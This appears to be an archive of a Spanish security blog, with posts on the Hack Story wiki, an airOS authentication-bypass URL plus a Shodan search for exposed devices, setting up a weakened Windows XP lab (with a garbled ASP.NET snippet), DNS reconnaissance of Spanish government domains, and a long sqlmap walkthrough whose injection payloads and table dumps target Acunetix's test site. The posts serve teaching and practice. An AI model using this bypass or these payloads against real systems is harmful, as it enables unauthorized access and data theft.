Caminando entre bits... » hacking

Hack Story

Marc Rivero López — Mon, 02 Jan 2012 06:00:15 +0000

Hola!

Muy buenas a todos/as!

No podía dejar de poner en este blog la web de Hack Story un proyecto que administra la ya conocida en la red Merce Molist.

Así que empezamos el “primer día” laborable en la que os recomiendo esta web.

Hack Story nace en verano de 2008 en Barcelona. Es un proyecto vivo de recuperación de la historia de la comunidad hacker.

Os copio y pego la definición del about:

Hack Story nace en verano de 2008 en Barcelona. Es un proyecto vivo de recuperación de la historia de la comunidad hacker.

Actualmente abarca la comunidad hacker hispana, aunque tiene vocación planetaria, de ahí el uso del inglés en los principales parámetros, categorías y textos de presentación. El contenido, en cambio, se escribe en el idioma de sus protagonistas. Otras lenguas, espacios y tiempos son bienvenidos.

Hack Story se manifiesta en la red a través de una plataforma wiki, para que cualquiera pueda corregir errores o añadir datos (debido a recientes bombardeos de “spam”, hemos moderado la introducción de nueva información en el wiki, así como la creación de nuev@os usuari@s).

Mercè Molist es la administradora del wiki en lo que a contenidos se refiere. Xavi Caballé aportó desinteresadamente el alojamiento en sus inicios y Alfonso, la personalización del wiki y ayuda técnica. Gracias a Harko por el apoyo gráfico y a Blackhold por actualizar el software, ambos de forma voluntaria. Actualmente la Hackstory tiene alojamiento y servicio técnico gratuitos en NONFQDN. ¡Gracias!

Hack Story está sujeta a su propia política, a la ética hacker y a las leyes vigentes, por este orden

Os adjunto un pantallazo del Hack Story

Os animo a pasaros por esta Wiki a aprender mas sobre los Hackers

Saludos

Filed under: Seguridad Tagged: Hack Story, hackers, hacking, Seguridad

0day en sistema operativo airos

Marc Rivero López — Mon, 26 Dec 2011 06:00:30 +0000

Hola!

Muy buenas a todos/as!

Es MUY conocida la marca Ubiquity como producto Wireless. Su bajo coste, además de lo fácil, rápido y la gran cantidad de funcionalidades que tienen convierte este tipo de dispositivos en una gran ayuda en el montaje de infraestructuras Wireless.

El sistema operativo que administra estos dispositivos es airos, y no está exento a fallos de seguridad.

El fallo reside en que poder visitar la página de administración llamando directamente al admin.cgi del dispositivo.

Un PoC puede este mismo, nos encontramos con la pantalla de login:

En la URL solo tendríamos que invocar el archivo admin.cgi/sd.css para acceder a la parte de administración:

Este sería el resultado de poder pedir la petición al archivo de admin.CGI

Este fallo es bastante grande ya que permite administrar el dispositivo sin tener credenciales sobre el mismo.

Además gracias a Shodan es posible encontrar dispositivos con airos

http://www.shodanhq.com/search?q=airos

Es importante actualizar los dispositivos a última versión para corregir este fallo

Saludos cordiales

Filed under: Seguridad Tagged: 0day, AIROS, hacking, Seguridad, ubiquity

Preparando Windows XP-SP2 para entorno de pruebas de auditoría

Marc Rivero López — Sat, 24 Dec 2011 06:00:38 +0000

Hola!

Muy buenas a todos/as!

Si queremos hacer prácticas con Metasploit u otras herramientas en un entorno controlado es bueno poder tener un sistema operativo configurado de manera que pueda ser susceptible a ataques para poder practicar. Los de Offensive Security tienen una guía de como configurar un Windows XP Service Pack 2 para habilitar servicios y aplicaciones vulnerables. Me he basado en la web de Offensive Security, recordad que para habilitar estos servicios deberemos de contar una licencia de Windows XP SP2.

No entraré en detalles de como realizar una instalación de Windows, sólo hay que instalarla con las opciones por defecto.

Una vez instalado vamos a configurar ciertas cosas.

Primero lo que haremos será deshabilitar protecciones nativas del sistema operativo además de desactivar las notificaciones.

Nos vamos al centro de Seguridad en Windows XP.

Desactivamos Firewall, antivirus, y vamos a las opciones de notificación que hay marcadas en la imagen

Desmarcamos las checkboxes.

Por defecto viene activado la compartición de archivos simple, pero no está de mas revisarlo. En opciones de carpeta comprobamos que este marcado:

Ahora ya hemos configurado una parte de sistema operativo

Lo segundo es configurar servicios adicionales, por eso nos iremos a añadir o remover componentes de Windows en Agregar o quitar programas

Instalamos ISS y FTP. Además también instalamos SNMP

Tercero instalamos SQL Server Express para configurar una aplicación vulnerable

Para instalar SQL Server Express nos hará falta como requisitos Net Framework y Windows Installer 3.1

Net Framework 2.0

Windows Installer 3.1

SQL Server Express

En la instalación de SQLL Server Express cuando lleguemos al apartado de autenticación

Ponemos como password password1

Una vez terminada la instalación tenemos que configurarlo.

Accedemos al SQL Server Configuration Manager

En el apartado de TCP/IP en propiedades configuramos

Dejamos los valores como pone en la imagen

En el apartado de SQL Browser ponemos que se inicie de manera automática

Ahora para finalizar con Netstat miramos las conexiones

Primero bajamos Server Management Studio Express

Una vez abierto, nos autenticamos con sa y password1

Creamos una nueva base de datos

En la nueva base de datos creamos una tabla

Rellenamos la tabla con los siguientes campos

Rellenamos la tabla con datos reales

Ahora en el apartado de Seguridad le damos a New Login

En Login le damos a search y buscamos el usuario aspnet

Por último configuramos que el usuario aspnet sea owner de la base de datos que hemos creado

Para crear la aplicación vulnerable web creamos en wwwroot el archivo Default.aspx

<%@ Page Language=”C#” AutoEventWireup=”true” ValidateRequest=”false” CodeFile=”Default.aspx.cs” Inherits=”_Default” %> <%–the ValidateRequest=”true” in the page directive will check for // }

Y por último creamos el archivo web.config

tags for each of the errors you want to handle.
“On” Always display custom (friendly) messages. “Off” Always display detailed ASP.NET error information. “RemoteOnly” Display custom (friendly) messages only to users not running on the local Web server. This setting is recommended for security purposes, so that you do not display application detail information to remote clients. –> “None” No authentication is performed. “Windows” IIS performs authentication (Basic, Digest, or Integrated Windows) according to its settings for the application. Anonymous access must be disabled in IIS. “Forms” You provide a custom form (Web page) for users to enter their credentials, and then you authenticate them in your application. A user credential token is stored in a cookie. “Passport” Authentication is performed via a centralized authentication service provided by Microsoft that offers a single logon and core profile services for member sites. –> –> cookieless=”false” timeout=”20″/>

Ya tenemos la aplicación web vulnerable, mas adelante haremos prueba de intrusión.

Saludos cordiales

Filed under: Seguridad Tagged: hacking, Metasploitable, Seguridad, Windows XP

Reconocimiento activo y pasivo

Marc Rivero López — Sun, 04 Sep 2011 13:09:47 +0000

Hola!

Muy buenas a todos/as!

A la hora de hacer una auditoría es importante saber que vamos a auditar. Hay dos maneras de hacer esto, de manera activa o de manera pasiva.

La diferencia es, de manera activa que sería usando herramientas que generen avisos en el sitio remoto donde haremos la auditoría.

Y la alternativa sería de manera pasiva que sería usando herramientas que recopilen información de manera pasiva, es decir, que sea pública.

En un proceso de reconocimiento podemos indicar 10 fases:

Bloques de red
DNS
Nombres y dominios
Rango de red y subred
Direcciones IP’s específicas
Máquinas activas
Puertos abiertos y aplicaciones
Detectar sistema operativo
Información relacionada con el email, teléfonos
País y ciudad donde residen los servidores

Con esta información si logramos identificarla de manera pasiva tendremos muchos datos, sin que lo sepan, para poder hacer el ataque.

Empezamos con los bloques de red, es decir, que direcciones IP utiliza la organización en cuestión

Podemos por ejemplo hacer una enumeración de los servidores de email, los servidores DNS etc.. Para ello podemos usar DNSrecon

macbook:dnsrecon seifreed$ python dnsrecon.py -d aeat.es
[*] Performing General Enumeration of Domain: aeat.es
[*]	SOA esifw1.tsai.es 213.0.43.37
[*]	NS esifw1.tsai.es 213.0.43.37
[*]	NS esifw2.tsai.es 213.4.194.5
[*]	MX correodeempresas.telefonica.es 212.170.236.87
[*]	A aeat.es 195.235.106.193
[*] Enumerating SRV Records
[-] No SRV Records Found for aeat.es
[*] 0 Records Found

Y también de la Agencia Tributaria

macbook:dnsrecon seifreed$ python dnsrecon.py -d agenciatributaria.es
[*] Performing General Enumeration of Domain: agenciatributaria.es
[*]	SOA ns1.telefonica-data.com 213.0.43.37
[*]	NS ns2.telefonica-data.com 213.4.194.5
[*]	NS ns1.telefonica-data.com 213.0.43.37
[-] Could not Resolve MX Records for agenciatributaria.es
[*]	A agenciatributaria.es 212.170.236.148
[*] Enumerating SRV Records
[-] No SRV Records Found for agenciatributaria.es
[*] 0 Records Found

Ya hemos obtenido diferente información acerca de los NS y los MX y los DNS

La segunda parte que era obtener información acerca de los DNS, ya los tenemos.

Ahora obtendremos los diferentes dominios, podemos usar para ello Maltego

Ya tenemos mas información, ahora con otra herramienta como es netcraft podemos obtener sistemas operativos y demás

La información la podemos obtener desde aquí

Informción NetCraft

Estos son algunas de las cosas que podemos obtener de manera pasiva.

Así que ya sabéis

Un saludo

Filed under: Seguridad Tagged: activo, hacking, pasivo

SQLMap

Marc Rivero López — Thu, 18 Aug 2011 15:10:26 +0000

Hola!

Muy buenas a todos/as!

SQLMap es una herramienta para automatizar la explotación de vulnerabilidades SQL.

Para disponer de la última versión y, por lo tanto poder usar todas sus características bajamos la última versión con svn
root@bt:/pentest/database/sqlmap# svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev
Ya disponemos de la última versión de SQLMap.

Ahora empezaremos ha hacer una prueba.

Primero hay que encontrar una página web vulnerable, y además si permite hacer inyección y extraer información.

Empezamos,

root@bt:/pentest/database/sqlmap# python sqlmap.py -u http://test.acunetix.com/listproducts.php?cat=1 

    sqlmap/1.0-dev (r4356) - automatic SQL injection and database takeover tool

http://www.sqlmap.org

[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal.
 It is the end user's responsibility to obey all applicable local, state and federal laws. 
Authors assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 16:36:55

[16:36:55] [INFO] using '/pentest/database/sqlmap/output/test.acunetix.com/session' as session file
[16:36:55] [INFO] resuming injection data from session file
[16:36:55] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:36:55] [INFO] testing connection to the target url
[16:36:56] [INFO] heuristics detected web page charset 'ascii'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: cat
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cat=1 AND 1192=1192

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: cat=1 AND (SELECT 5536 FROM(SELECT COUNT(*),CONCAT(CHAR(58,106,100,110,58),
(SELECT (CASE WHEN (5536=5536) THEN 1 ELSE 0 END)),CHAR(58,102,122,100,58),FLOOR(RAND(0)*2))x 
FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 11 columns
    Payload: cat=1 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 
CONCAT(CHAR(58,106,100,110,58),IFNULL(CAST(CHAR(67,70,97,65,113,108,122,107,67,116) AS CHAR),
CHAR(32)),CHAR(58,102,122,100,58)), NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: cat=1 AND SLEEP(5)
---

[16:36:56] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake)
web application technology: Apache 2.0.55, PHP 5.1.2
back-end DBMS: MySQL 5.0
[16:36:56] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/test.acunetix.com'
[*] shutting down at 16:36:56

He remarcado en rojo información importante.

Podemos ver que es vulnerable así que ahora extraeremos tanto los usuarios como las bases de datos

root@bt:/pentest/database/sqlmap# python sqlmap.py -u http://test.acunetix.com/listproducts.php?cat=1 --dbs --users

    sqlmap/1.0-dev (r4356) - automatic SQL injection and database takeover tool

http://www.sqlmap.org

[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent
 is illegal. It is the end user's responsibility to obey all applicable local, state and
 federal laws. Authors assume no liability and are not responsible for any misuse or damage 
caused by this program

[*] starting at 16:41:00

[16:41:00] [INFO] using '/pentest/database/sqlmap/output/test.acunetix.com/session' as session file
[16:41:00] [INFO] resuming injection data from session file
[16:41:00] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:41:00] [INFO] testing connection to the target url
[16:41:01] [INFO] heuristics detected web page charset 'ascii'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: cat
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cat=1 AND 1192=1192

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: cat=1 AND (SELECT 5536 FROM(SELECT COUNT(*),CONCAT(CHAR(58,106,100,110,58),
(SELECT (CASE WHEN (5536=5536) THEN 1 ELSE 0 END)),CHAR(58,102,122,100,58),FLOOR(RAND(0)*2))x
 FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 11 columns
    Payload: cat=1 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 
CONCAT(CHAR(58,106,100,110,58),IFNULL(CAST(CHAR(67,70,97,65,113,108,122,107,67,116) AS CHAR),
CHAR(32)),CHAR(58,102,122,100,58)), NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: cat=1 AND SLEEP(5)
---

[16:41:01] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake)
web application technology: Apache 2.0.55, PHP 5.1.2
back-end DBMS: MySQL 5.0
[16:41:01] [INFO] fetching database users
database management system users [1]:
[*] 'acuart'@'localhost'

[16:41:01] [INFO] fetching database names
available databases [3]:
[*] acuart
[*] information_schema
[*] modrewriteShop

[16:41:01] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/test.acunetix.com'

[*] shutting down at 16:41:01

Queda remaracado en rojo información acerca de la bases de datos además del usuario.

Ahora sacaremos las tablas concretas de una base de datos

root@bt:/pentest/database/sqlmap# python sqlmap.py 
-u http://test.acunetix.com/listproducts.php?cat=1 -D acuart --tables

    sqlmap/1.0-dev (r4356) - automatic SQL injection and database takeover tool

http://www.sqlmap.org

[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual
 consent is illegal. It is the end user's responsibility to obey all applicable local,
 state and federal laws. Authors assume no liability and are not responsible for any misuse or 
damage caused by this program

[*] starting at 16:46:44

[16:46:44] [INFO] using '/pentest/database/sqlmap/output/test.acunetix.com/session' as session file
[16:46:44] [INFO] resuming injection data from session file
[16:46:44] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:46:45] [INFO] testing connection to the target url
[16:46:45] [INFO] heuristics detected web page charset 'ascii'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: cat
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cat=1 AND 1192=1192

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: cat=1 AND (SELECT 5536 FROM(SELECT COUNT(*),CONCAT(CHAR(58,106,100,110,58),
(SELECT (CASE WHEN (5536=5536) THEN 1 ELSE 0 END)),CHAR(58,102,122,100,58),FLOOR(RAND(0)*2))x
 FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 11 columns
    Payload: cat=1 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 
CONCAT(CHAR(58,106,100,110,58),IFNULL(CAST(CHAR(67,70,97,65,113,108,122,107,67,116) AS CHAR),
CHAR(32)),CHAR(58,102,122,100,58)), NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: cat=1 AND SLEEP(5)
---

[16:46:45] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake)
web application technology: Apache 2.0.55, PHP 5.1.2
back-end DBMS: MySQL 5.0
[16:46:45] [INFO] fetching tables for database: acuart
[16:46:45] [INFO] read from file '/pentest/database/sqlmap/output/test.acunetix.com/session': 
acuart, artists, acuart, carts, acuart, categ, acuart, featured, acuart, guestbook, acuart, pictures,
 acuart, users
Database: acuart
[7 tables]
+-----------+
| artists |
| carts |
| categ |
| featured |
| guestbook |
| pictures |
| users |
+-----------+

[16:46:45] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/test.acunetix.com'

[*] shutting down at 16:46:45

Ahora que ya tenemos las tablas, iremos a buscar las columnas

root@bt:/pentest/database/sqlmap# python sqlmap.py -u http://test.acunetix.com/listproducts.php?cat=1 -D acuart
 --columns

    sqlmap/1.0-dev (r4356) - automatic SQL injection and database takeover tool

http://www.sqlmap.org

[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is
 illegal. It is the end user's responsibility to obey all applicable local, state and federal laws.
 Authors assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 16:50:28

[16:50:28] [INFO] using '/pentest/database/sqlmap/output/test.acunetix.com/session' as session file
[16:50:28] [INFO] resuming injection data from session file
[16:50:28] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:50:29] [INFO] testing connection to the target url
[16:50:29] [INFO] heuristics detected web page charset 'ascii'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: cat
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cat=1 AND 1192=1192

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: cat=1 AND (SELECT 5536 FROM(SELECT COUNT(*),CONCAT(CHAR(58,106,100,110,58),(SELECT 
(CASE WHEN (5536=5536) THEN 1 ELSE 0 END)),CHAR(58,102,122,100,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.
CHARACTER_SETS GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 11 columns
    Payload: cat=1 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL,
 CONCAT(CHAR(58,106,100,110,58),IFNULL(CAST(CHAR(67,70,97,65,113,108,122,107,67,116) AS
 CHAR),CHAR(32)),CHAR(58,102,122,100,58)), NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: cat=1 AND SLEEP(5)
---

[16:50:29] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake)
web application technology: Apache 2.0.55, PHP 5.1.2
back-end DBMS: MySQL 5.0
[16:50:29] [INFO] fetching tables for database: acuart
[16:50:29] [INFO] read from file '/pentest/database/sqlmap/output/test.acunetix.com/session': 
acuart, artists, acuart, carts, acuart, categ, acuart, featured, acuart, guestbook, acuart, pictures,
 acuart, users
[16:50:29] [INFO] fetching columns for table 'guestbook' on database 'acuart'
[16:50:29] [INFO] fetching columns for table 'carts' on database 'acuart'
[16:50:30] [INFO] fetching columns for table 'categ' on database 'acuart'
[16:50:30] [INFO] fetching columns for table 'featured' on database 'acuart'
[16:50:30] [INFO] fetching columns for table 'artists' on database 'acuart'
[16:50:31] [INFO] fetching columns for table 'pictures' on database 'acuart'
[16:50:31] [INFO] fetching columns for table 'users' on database 'acuart'
Database: acuart
Table: categ
[3 columns]
+--------+-------------+
| Column | Type |
+--------+-------------+
| cat_id | int(5) |
| cdesc | tinytext |
| cname | varchar(50) |
+--------+-------------+

Database: acuart
Table: users
[8 columns]
+---------+--------------+
| Column | Type |
+---------+--------------+
| address | mediumtext |
| cart | varchar(100) |
| cc | varchar(100) |
| email | varchar(100) |
| name | varchar(100) |
| pass | varchar(100) |
| phone | varchar(100) |
| uname | varchar(100) |
+---------+--------------+

Database: acuart
Table: carts
[3 columns]
+---------+--------------+
| Column | Type |
+---------+--------------+
| cart_id | varchar(100) |
| item | int(11) |
| price | int(11) |
+---------+--------------+

Database: acuart
Table: pictures
[8 columns]
+--------+--------------+
| Column | Type |
+--------+--------------+
| a_id | int(11) |
| cat_id | int(11) |
| img | varchar(50) |
| pic_id | int(5) |
| plong | text |
| price | int(11) |
| pshort | mediumtext |
| title | varchar(100) |
+--------+--------------+

Database: acuart
Table: featured
[2 columns]
+--------------+---------+
| Column | Type |
+--------------+---------+
| feature_text | text |
| pic_id | int(11) |
+--------------+---------+

Database: acuart
Table: artists
[3 columns]
+-----------+-------------+
| Column | Type |
+-----------+-------------+
| adesc | text |
| aname | varchar(50) |
| artist_id | int(5) |
+-----------+-------------+

Database: acuart
Table: guestbook
[3 columns]
+----------+--------------+
| Column | Type |
+----------+--------------+
| mesaj | text |
| sender | varchar(150) |
| senttime | int(32) |
+----------+--------------+

[16:50:31] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/test.acunetix.com'

[*] shutting down at 16:50:31

Ya tenemos la información referente a las columnas

root@bt:/pentest/database/sqlmap# python sqlmap.py -u http://test.acunetix.com/listproducts.php?cat=1 -D acuart
 --dump

    sqlmap/1.0-dev (r4356) - automatic SQL injection and database takeover tool

http://www.sqlmap.org

[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal.
 It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume 
no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 16:56:33

[16:56:33] [INFO] using '/pentest/database/sqlmap/output/test.acunetix.com/session' as session file
[16:56:33] [INFO] resuming injection data from session file
[16:56:33] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:56:33] [INFO] testing connection to the target url
[16:56:34] [INFO] heuristics detected web page charset 'ascii'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: cat
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cat=1 AND 1192=1192

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: cat=1 AND (SELECT 5536 FROM(SELECT COUNT(*),CONCAT(CHAR(58,106,100,110,58),
(SELECT (CASE WHEN (5536=5536) THEN 1 ELSE 0 END)),CHAR(58,102,122,100,58),FLOOR(RAND(0)*2))x
 FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 11 columns
    Payload: cat=1 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL,
 CONCAT(CHAR(58,106,100,110,58),IFNULL(CAST(CHAR(67,70,97,65,113,108,122,107,67,116) AS
 CHAR),CHAR(32)),CHAR(58,102,122,100,58)), NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: cat=1 AND SLEEP(5)
---

[16:56:34] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake)
web application technology: Apache 2.0.55, PHP 5.1.2
back-end DBMS: MySQL 5.0
[16:56:34] [INFO] fetching tables for database: acuart
[16:56:34] [INFO] read from file '/pentest/database/sqlmap/output/test.acunetix.com/session':
 acuart, artists, acuart, carts, acuart, categ, acuart, featured, acuart, guestbook, acuart, pictures,
 acuart, users
[16:56:34] [INFO] fetching columns for table 'guestbook' on database 'acuart'
[16:56:34] [INFO] read from file '/pentest/database/sqlmap/output/test.acunetix.com/session': sender,
 varchar(150), mesaj, text, senttime, int(32)
[16:56:34] [INFO] fetching entries for table 'guestbook' on database 'acuart'
[16:56:35] [WARNING] if the problem persists with 'None' values please try to use hidden switch 
--no-cast (fixing problems with some collation issues)
[16:56:35] [WARNING] the SQL query provided does not return any output
Database: acuart
Table: guestbook
[0 entries]
+-------+--------+----------+
| mesaj | sender | senttime |
+-------+--------+----------+
+-------+--------+----------+

[16:56:35] [INFO] Table 'acuart.guestbook' dumped to CSV file '/pentest/database/sqlmap/output/test.acunetix.com
/dump/acuart/guestbook.csv'
[16:56:35] [INFO] fetching columns for table 'carts' on database 'acuart'
[16:56:35] [INFO] read from file '/pentest/database/sqlmap/output/test.acunetix.com/session': cart_id, 
varchar(100), price, int(11), item, int(11)
[16:56:35] [INFO] fetching entries for table 'carts' on database 'acuart'
recognized possible password hashes in column cart_id. Do you want to crack them via a dictionary-based
 attack? [Y/n/q] y
[16:56:51] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files

[16:57:04] [INFO] using default dictionary
[16:57:04] [INFO] loading dictionary from '/pentest/database/sqlmap/txt/wordlist.txt'
do you want to use common password suffixes? (slow!) [y/N] n
[16:57:10] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[16:57:46] [WARNING] no clear password(s) found 
Database: acuart
Table: carts
[43 entries]
+----------------------------------+------------+-------+
| cart_id | item | price |
+----------------------------------+------------+-------+
| 59bc1b0b420b28ec09d673886c9e6c5e | 6 | 10000 |
| 92cd2d36a3ebf3e3227f8573f8682b98 | 0 | 500 |
| 59bc1b0b420b28ec09d673886c9e6c5e | 7 | 15000 |
| 103182aada3cc3df0f6eb53e12338805 | 3 | 986 |
| 62d636f894e9e726dc6a0300fd2aa2f3 | 3 | 986 |
| 407f7a7006ae7e1e290a0deef4adddca | 5 | 444 |
| 407f7a7006ae7e1e290a0deef4adddca | 2 | 1230 |
| 92cd2d36a3ebf3e3227f8573f8682b98 | -268435455 | 500 |
| 59bc1b0b420b28ec09d673886c9e6c5e | 3 | 986 |
| 94e69794012f981ba39b45e3d67b9bb4 | 6 | 10000 |
| 92cd2d36a3ebf3e3227f8573f8682b98 | -1 | 500 |
| 92cd2d36a3ebf3e3227f8573f8682b98 | 3 | 986 |
| ee7a540800a6314cb8e853294a3fd364 | -268435455 | 986 |
| 92cd2d36a3ebf3e3227f8573f8682b98 | 2 | 800 |
| 103182aada3cc3df0f6eb53e12338805 | 4 | 1000 |
| 92cd2d36a3ebf3e3227f8573f8682b98 | 6 | 10000 |
| ee7a540800a6314cb8e853294a3fd364 | 0 | 986 |
| 103182aada3cc3df0f6eb53e12338805 | 6 | 10000 |
| 103182aada3cc3df0f6eb53e12338805 | 1 | 500 |
| 407f7a7006ae7e1e290a0deef4adddca | 7 | 1 |
| ee7a540800a6314cb8e853294a3fd364 | -1 | 986 |
| fb410f050b45babb0fa88ae1c7e5dcce | 2 | 800 |
| 407f7a7006ae7e1e290a0deef4adddca | 1 | 500 |
| 92cd2d36a3ebf3e3227f8573f8682b98 | 5 | 460 |
| 3fc1a7bc4d6afab0889708ed649f5e59 | 1 | 500 |
| 59bc1b0b420b28ec09d673886c9e6c5e | 1 | 500 |
| 59bc1b0b420b28ec09d673886c9e6c5e | 2 | 800 |
| 92cd2d36a3ebf3e3227f8573f8682b98 | 7 | 15000 |
| 92cd2d36a3ebf3e3227f8573f8682b98 | 4 | 1000 |
| ee7a540800a6314cb8e853294a3fd364 | 268435455 | 986 |
| 62d636f894e9e726dc6a0300fd2aa2f3 | 1 | 500 |
| ee7a540800a6314cb8e853294a3fd364 | 3 | 986 |
| 407f7a7006ae7e1e290a0deef4adddca | 6 | 123 |
| 357dce450e0ca7bd2d1c04f55905e10f | 1 | 500 |
| 92cd2d36a3ebf3e3227f8573f8682b98 | 268435455 | 500 |
| 59bc1b0b420b28ec09d673886c9e6c5e | 4 | 1000 |
| a33e8f5069b5a8d7e6b579697bfaf96d | 1 | 500 |
| 59bc1b0b420b28ec09d673886c9e6c5e | 5 | 460 |
| e8513b2f278260d085e29bc4491cdf0b | 2 | 8 |
| 94e69794012f981ba39b45e3d67b9bb4 | 3 | 986 |
| 92cd2d36a3ebf3e3227f8573f8682b98 | 1 | 500 |
| 62d636f894e9e726dc6a0300fd2aa2f3 | 2 | 800 |
| 9c7ab77a32a914594d838f1e657f56ab | 5 | 100 |
+----------------------------------+------------+-------+

[16:57:46] [INFO] Table 'acuart.carts' dumped to CSV file '/pentest/database/sqlmap/output/test.acunetix.com/dump/acuart/carts.csv'
[16:57:46] [INFO] fetching columns for table 'categ' on database 'acuart'
[16:57:46] [INFO] read from file '/pentest/database/sqlmap/output/test.acunetix.com/session': cat_id, int(5), cname, varchar(50), cdesc, tinytext
[16:57:46] [INFO] fetching entries for table 'categ' on database 'acuart'
Database: acuart
Table: categ
[4 entries]
+--------+---------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------------------
----------------------------------------------------------------+-----------+
| cat_id | cdesc | cname |
+--------+-------------------------------------------------------------------------------------------------
-----------------------------------------------------------------------------------------------------------
--------------------------------------------------------+-----------+
| 1 | Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie.\n Sed aliquam sem ut arcu. 
Phasellus sollicitudin. Vestibulum condimentum facilisis\n nulla. In hac habitasse platea dictumst. Nulla nonummy.
 Cras quis libero.\n Cras venenati | Posters |
| 3 | Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie.\n Sed aliquam sem ut arcu.
 Phasellus sollicitudin. Vestibulum condimentum facilisis\n nulla. In hac habitasse platea dictumst. Nulla
 nonummy. Cras quis libero.\n Cras venenati | Stickers |
| 4 | Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie.\n Sed aliquam sem ut arcu. 
Phasellus sollicitudin. Vestibulum condimentum facilisis\n nulla. In hac habitasse platea dictumst. 
Nulla nonummy. Cras quis libero.\n Cras venenati | Graffity |
| 2 | Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie.\n Sed aliquam sem ut arcu.
 Phasellus sollicitudin. Vestibulum condimentum facilisis\n nulla. In hac habitasse platea dictumst. Nulla nonummy. 
Cras quis libero.\n Cras venenati | Paintings |
+--------+---------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------
-----------------------------------------+-----------+

[16:57:48] [INFO] Table 'acuart.categ' dumped to CSV file '/pentest/database/sqlmap/output/test.acunetix.com/dump
/acuart/categ.csv'
[16:57:48] [INFO] fetching columns for table 'featured' on database 'acuart'
[16:57:48] [INFO] read from file '/pentest/database/sqlmap/output/test.acunetix.com/session': pic_id, int(11), 
feature_text, text
[16:57:48] [INFO] fetching entries for table 'featured' on database 'acuart'
[16:57:48] [WARNING] the SQL query provided does not return any output
Database: acuart
Table: featured
[0 entries]
+--------------+--------+
| feature_text | pic_id |
